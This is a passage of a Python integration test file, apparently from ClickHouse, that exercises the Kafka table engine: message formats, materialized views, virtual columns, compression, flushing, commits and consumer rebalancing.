kafka_group_name = 'json',
kafka_format = 'JSONEachRow';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_protobuf(kafka_cluster):
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 0, 20)
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 20, 1)
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 21, 29)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb',
kafka_group_name = 'pb',
kafka_format = 'Protobuf',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_string_field_on_first_position_in_protobuf(kafka_cluster):
# https://github.com/ClickHouse/ClickHouse/issues/12615
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 0, 20)
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 20, 1)
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 21, 29)
instance.query('''
CREATE TABLE test.kafka (
username String,
timestamp Int32
) ENGINE = Kafka()
SETTINGS
kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'string_field_on_first_position_in_protobuf',
kafka_group_name = 'string_field_on_first_position_in_protobuf',
kafka_format = 'Protobuf',
kafka_schema = 'social:User';
''')
result = instance.query('SELECT * FROM test.kafka', ignore_error=True)
expected = '''\
John Doe 0 1000000
John Doe 1 1000001
John Doe 2 1000002
John Doe 3 1000003
John Doe 4 1000004
John Doe 5 1000005
John Doe 6 1000006
John Doe 7 1000007
John Doe 8 1000008
John Doe 9 1000009
John Doe 10 1000010
John Doe 11 1000011
John Doe 12 1000012
John Doe 13 1000013
John Doe 14 1000014
John Doe 15 1000015
John Doe 16 1000016
John Doe 17 1000017
John Doe 18 1000018
John Doe 19 1000019
John Doe 20 1000020
John Doe 21 1000021
John Doe 22 1000022
John Doe 23 1000023
John Doe 24 1000024
John Doe 25 1000025
John Doe 26 1000026
John Doe 27 1000027
John Doe 28 1000028
John Doe 29 1000029
John Doe 30 1000030
John Doe 31 1000031
John Doe 32 1000032
John Doe 33 1000033
John Doe 34 1000034
John Doe 35 1000035
John Doe 36 1000036
John Doe 37 1000037
John Doe 38 1000038
John Doe 39 1000039
John Doe 40 1000040
John Doe 41 1000041
John Doe 42 1000042
John Doe 43 1000043
John Doe 44 1000044
John Doe 45 1000045
John Doe 46 1000046
John Doe 47 1000047
John Doe 48 1000048
John Doe 49 1000049
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(30)
def test_kafka_protobuf_no_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb_no_delimiter',
kafka_group_name = 'pb_no_delimiter',
kafka_format = 'ProtobufSingle',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 0, 20)
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 20, 1)
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 21, 29)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
instance.query('''
CREATE TABLE test.kafka_writer (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb_no_delimiter',
kafka_group_name = 'pb_no_delimiter',
kafka_format = 'ProtobufSingle',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
instance.query("INSERT INTO test.kafka_writer VALUES (13,'Friday'),(42,'Answer to the Ultimate Question of Life, the Universe, and Everything'), (110, 'just a number')")
time.sleep(1)
result = instance.query("SELECT * FROM test.kafka ORDER BY key", ignore_error=True)
expected = '''\
13 Friday
42 Answer to the Ultimate Question of Life, the Universe, and Everything
110 just a number
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(180)
def test_kafka_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mv',
kafka_group_name = 'mv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mv', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_librdkafka_compression(kafka_cluster):
"""
Regression for UB in snappy-c (that is used in librdkafka),
backport pr is [1].
[1]: https://github.com/ClickHouse-Extras/librdkafka/pull/3
Example of corruption:
2020.12.10 09:59:56.831507 [ 20 ] {} <Error> void DB::StorageKafka::threadFunc(size_t): Code: 27, e.displayText() = DB::Exception: Cannot parse input: expected '"' before: 'foo"}': (while reading the value of key value): (at row 1)
To trigger this regression there should duplicated messages
Orignal reproducer is:
$ gcc --version |& fgrep gcc
gcc (GCC) 10.2.0
$ yes foobarbaz | fold -w 80 | head -n10 >| in-…
$ make clean && make CFLAGS='-Wall -g -O2 -ftree-loop-vectorize -DNDEBUG=1 -DSG=1 -fPIC'
$ ./verify in
final comparision of in failed at 20 of 100
"""
supported_compression_types = ['gzip', 'snappy', 'lz4', 'zstd', 'uncompressed']
messages = []
expected = []
value = 'foobarbaz'*10
number_of_messages = 50
for i in range(number_of_messages):
messages.append(json.dumps({'key': i, 'value': value}))
expected.append(f'{i}\t{value}')
expected = '\n'.join(expected)
for compression_type in supported_compression_types:
logging.debug(('Check compression {}'.format(compression_type)))
topic_name = 'test_librdkafka_compression_{}'.format(compression_type)
admin_client = admin.AdminClient({'bootstrap.servers': "localhost:{}".format(kafka_cluster.kafka_port)})
topic = admin.NewTopic(topic=topic_name, num_partitions=1, replication_factor=1, config={
'compression.type': compression_type,
})
admin_client.create_topics(new_topics=[topic], validate_only=False)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = 'JSONEachRow',
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.consumer Engine=Log AS
SELECT * FROM test.kafka;
'''.format(topic_name=topic_name) )
kafka_produce(kafka_cluster, topic_name, messages)
instance.wait_for_log_line("Committed offset {}".format(number_of_messages))
result = instance.query('SELECT * FROM test.consumer')
assert TSV(result) == TSV(expected)
instance.query('DROP TABLE test.kafka SYNC')
instance.query('DROP TABLE test.consumer SYNC')
@pytest.mark.timeout(180)
def test_kafka_materialized_view_with_subquery(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mvsq',
kafka_group_name = 'mvsq',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM (SELECT * FROM test.kafka);
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mvsq', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_many_materialized_views(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view1;
DROP TABLE IF EXISTS test.view2;
DROP TABLE IF EXISTS test.consumer1;
DROP TABLE IF EXISTS test.consumer2;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mmv',
kafka_group_name = 'mmv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view1 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.view2 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer1 TO test.view1 AS
SELECT * FROM test.kafka;
CREATE MATERIALIZED VIEW test.consumer2 TO test.view2 AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mmv', messages)
while True:
result1 = instance.query('SELECT * FROM test.view1')
result2 = instance.query('SELECT * FROM test.view2')
if kafka_check_result(result1) and kafka_check_result(result2):
break
instance.query('''
DROP TABLE test.consumer1;
DROP TABLE test.consumer2;
DROP TABLE test.view1;
DROP TABLE test.view2;
''')
kafka_check_result(result1, True)
kafka_check_result(result2, True)
@pytest.mark.timeout(300)
def test_kafka_flush_on_big_message(kafka_cluster):
# Create batchs of messages of size ~100Kb
kafka_messages = 1000
batch_messages = 1000
messages = [json.dumps({'key': i, 'value': 'x' * 100}) * batch_messages for i in range(kafka_messages)]
kafka_produce(kafka_cluster, 'flush', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush',
kafka_group_name = 'flush',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
received = False
while not received:
try:
offsets = client.list_consumer_group_offsets('flush')
for topic, offset in list(offsets.items()):
if topic.topic == 'flush' and offset.offset == kafka_messages:
received = True
break
except kafka.errors.GroupCoordinatorNotAvailableError:
continue
while True:
result = instance.query('SELECT count() FROM test.view')
if int(result) == kafka_messages * batch_messages:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert int(result) == kafka_messages * batch_messages, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(180)
def test_kafka_virtual_columns(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt1',
kafka_group_name = 'virt1',
kafka_format = 'JSONEachRow';
''')
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'virt1', [messages], 0)
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'virt1', [messages], 0)
result = ''
while True:
result += instance.query(
'''SELECT _key, key, _topic, value, _offset, _partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) AS _timestamp FROM test.kafka''',
ignore_error=True)
if kafka_check_result(result, False, 'test_kafka_virtual1.reference'):
break
kafka_check_result(result, True, 'test_kafka_virtual1.reference')
@pytest.mark.timeout(180)
def test_kafka_virtual_columns_with_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2',
kafka_group_name = 'virt2',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64, kafka_key String, topic String, offset UInt64, partition UInt64, timestamp Nullable(DateTime('UTC')))
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT *, _key as kafka_key, _topic as topic, _offset as offset, _partition as partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) as timestamp FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'virt2', messages, 0)
while True:
result = instance.query('SELECT kafka_key, key, topic, value, offset, partition, timestamp FROM test.view')
if kafka_check_result(result, False, 'test_kafka_virtual2.reference'):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True, 'test_kafka_virtual2.reference')
@pytest.mark.timeout(180)
def test_kafka_insert(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert1',
kafka_group_name = 'insert1',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
messages = []
while True:
messages.extend(kafka_consume(kafka_cluster, 'insert1'))
if len(messages) == 50:
break
result = '\n'.join(messages)
kafka_check_result(result, True)
@pytest.mark.timeout(240)
def test_kafka_produce_consume(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert2',
kafka_group_name = 'insert2',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages_num = 10000
def insert():
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
threads = []
threads_num = 16
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.view')
time.sleep(1)
if int(result) == messages_num * threads_num:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
for thread in threads:
thread.join()
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(300)
def test_kafka_commit_on_block_write(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
cancel = threading.Event()
i = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(101):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce(kafka_cluster, 'block', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
while int(instance.query('SELECT count() FROM test.view')) == 0:
time.sleep(1)
cancel.set()
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
''')
while int(instance.query('SELECT uniqExact(key) FROM test.view')) < i[0]:
time.sleep(1)
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.view'))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
@pytest.mark.timeout(180)
def test_kafka_virtual_columns2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="virt2_0", num_partitions=2, replication_factor=1))
topic_list.append(NewTopic(name="virt2_1", num_partitions=2, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
CREATE TABLE test.kafka (value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2_0,virt2_1',
kafka_group_name = 'virt2',
kafka_num_consumers = 2,
kafka_format = 'JSONEachRow';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT value, _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp), toUnixTimestamp64Milli(_timestamp_ms), _headers.name, _headers.value FROM test.kafka;
''')
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(cluster.kafka_port), value_serializer=producer_serializer, key_serializer=producer_serializer)
producer.send(topic='virt2_0', value=json.dumps({'value': 1}), partition=0, key='k1', timestamp_ms=1577836801001,
headers=[('content-encoding', b'base64')])
producer.send(topic='virt2_0', value=json.dumps({'value': 2}), partition=0, key='k2', timestamp_ms=1577836802002,
headers=[('empty_value', b''), ('', b'empty name'), ('', b''), ('repetition', b'1'), ('repetition', b'2')])
producer.flush()
producer.send(topic='virt2_0', value=json.dumps({'value': 3}), partition=1, key='k3', timestamp_ms=1577836803003,
headers=[('b', b'b'), ('a', b'a')])
producer.send(topic='virt2_0', value=json.dumps({'value': 4}), partition=1, key='k4', timestamp_ms=1577836804004,
headers=[('a', b'a'), ('b', b'b')])
producer.flush()
producer.send(topic='virt2_1', value=json.dumps({'value': 5}), partition=0, key='k5', timestamp_ms=1577836805005)
producer.send(topic='virt2_1', value=json.dumps({'value': 6}), partition=0, key='k6', timestamp_ms=1577836806006)
producer.flush()
producer.send(topic='virt2_1', value=json.dumps({'value': 7}), partition=1, key='k7', timestamp_ms=1577836807007)
producer.send(topic='virt2_1', value=json.dumps({'value': 8}), partition=1, key='k8', timestamp_ms=1577836808008)
producer.flush()
instance.wait_for_log_line('kafka.*Committed offset 2.*virt2_[01]', repetitions=4, look_behind_lines=6000)
members = describe_consumer_group(kafka_cluster, 'virt2')
# pprint.pprint(members)
members[0]['client_id'] = 'ClickHouse-instance-test-kafka-0'
members[1]['client_id'] = 'ClickHouse-instance-test-kafka-1'
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
expected = '''\
1 k1 virt2_0 0 0 1577836801 1577836801001 ['content-encoding'] ['base64']
2 k2 virt2_0 0 1 1577836802 1577836802002 ['empty_value','','','repetition','repetition'] ['','empty name','','1','2']
3 k3 virt2_0 1 0 1577836803 1577836803003 ['b','a'] ['b','a']
4 k4 virt2_0 1 1 1577836804 1577836804004 ['a','b'] ['a','b']
5 k5 virt2_1 0 0 1577836805 1577836805005 [] []
6 k6 virt2_1 0 1 1577836806 1577836806006 [] []
7 k7 virt2_1 1 0 1577836807 1577836807007 [] []
8 k8 virt2_1 1 1 1577836808 1577836808008 [] []
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(120)
def test_kafka_produce_key_timestamp(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="insert3", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka_writer (key UInt64, value UInt64, _key String, _timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.kafka (key UInt64, value UInt64, inserted_key String, inserted_timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT key, value, inserted_key, toUnixTimestamp(inserted_timestamp), _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp) FROM test.kafka;
''')
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(1, 1, 'k1', 1577836801))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(2, 2, 'k2', 1577836802))
instance.query(
"INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({})),({},{},'{}',toDateTime({}))".format(3, 3,
'k3',
1577836803,
4, 4,
'k4',
1577836804))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(5, 5, 'k5', 1577836805))
instance.wait_for_log_line("Committed offset 5")
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
# logging.debug(result)
expected = '''\
1 1 k1 1577836801 k1 insert3 0 0 1577836801
2 2 k2 1577836802 k2 insert3 0 1 1577836802
3 3 k3 1577836803 k3 insert3 0 2 1577836803
4 4 k4 1577836804 k4 insert3 0 3 1577836804
5 5 k5 1577836805 k5 insert3 0 4 1577836805
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(600)
def test_kafka_flush_by_time(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="flush_by_time", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_time',
kafka_group_name = 'flush_by_time',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
SELECT * FROM test.kafka;
CREATE TABLE test.view (key UInt64, value UInt64, ts DateTime64(3) MATERIALIZED now64(3))
ENGINE = MergeTree()
ORDER BY key;
''')
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce(kafka_cluster, 'flush_by_time', messages)
time.sleep(0.8)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
time.sleep(18)
result = instance.query('SELECT uniqExact(ts) = 2, count() >= 15 FROM test.view')
cancel.set()
kafka_thread.join()
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('1 1')
@pytest.mark.timeout(90)
def test_kafka_flush_by_block_size(kafka_cluster):
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce(kafka_cluster, 'flush_by_block_size', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_block_size',
kafka_group_name = 'flush_by_block_size',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_poll_max_batch_size = 1,
kafka_flush_interval_ms = 120000, /* should not flush by time during test */
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
# Wait for Kafka engine to consume this data
while 1 != int(instance.query(
"SELECT count() FROM system.parts WHERE database = 'test' AND table = 'view' AND name = 'all_1_1_0'")):
time.sleep(0.5)
cancel.set()
kafka_thread.join()
# more flushes can happens during test, we need to check only result of first flush (part named all_1_1_0).
result = instance.query("SELECT count() FROM test.view WHERE _part='all_1_1_0'")
# logging.debug(result)
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# 100 = first poll should return 100 messages (and rows)
# not waiting for stream_flush_interval_ms
assert int(
result) == 100, 'Messages from kafka should be flushed when block of size kafka_max_block_size is formed!'
@pytest.mark.timeout(600)
def test_kafka_lot_of_partitions_partial_commit_of_bulk(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="topic_with_multiple_partitions2", num_partitions=10, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions2',
kafka_group_name = 'topic_with_multiple_partitions2',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 211,
kafka_flush_interval_ms = 500;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
count = 0
for dummy_msg in range(1000):
rows = []
for dummy_row in range(random.randrange(3, 10)):
count = count + 1
rows.append(json.dumps({'key': count, 'value': count}))
messages.append("\n".join(rows))
kafka_produce(kafka_cluster, 'topic_with_multiple_partitions2', messages)
instance.wait_for_log_line('kafka.*Stalled', repetitions=5)
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(count))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
@pytest.mark.timeout(1200)
def test_kafka_rebalance(kafka_cluster):
NUMBER_OF_CONSURRENT_CONSUMERS = 11
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
# kafka_cluster.open_bash_shell('instance')
# time.sleep(2)
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="topic_with_multiple_partitions", num_partitions=11, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
cancel = threading.Event()
msg_index = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(59):
messages.append(json.dumps({'key': msg_index[0], 'value': msg_index[0]}))
msg_index[0] += 1
kafka_produce(kafka_cluster, 'topic_with_multiple_partitions', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS):
table_name = 'kafka_consumer{}'.format(consumer_index)
logging.debug(("Setting up {}".format(table_name)))
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
CREATE TABLE test.{0} (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions',
kafka_group_name = 'rebalance_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 33,
kafka_flush_interval_ms = 500;
CREATE MATERIALIZED VIEW test.{0}_mv TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp,
'{0}' as _consumed_by
FROM test.{0};
'''.format(table_name))
# kafka_cluster.open_bash_shell('instance')
# Waiting for test.kafka_consumerX to start consume ...
instance.wait_for_log_line('kafka_consumer{}.*Polled offset [0-9]+'.format(consumer_index))
cancel.set()
# I leave last one working by intent (to finish consuming after all rebalances)
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS - 1):
logging.debug(("Dropping test.kafka_consumer{}".format(consumer_index)))
instance.query('DROP TABLE IF EXISTS test.kafka_consumer{} SYNC'.format(consumer_index))
# logging.debug(instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination'))
# kafka_cluster.open_bash_shell('instance')
while 1:
messages_consumed = int(instance.query('SELECT uniqExact(key) FROM test.destination'))
if messages_consumed >= msg_index[0]:
break
time.sleep(1)
logging.debug(("Waiting for finishing consuming (have {}, should be {})".format(messages_consumed, msg_index[0])))
logging.debug((instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination')))
# Some queries to debug...
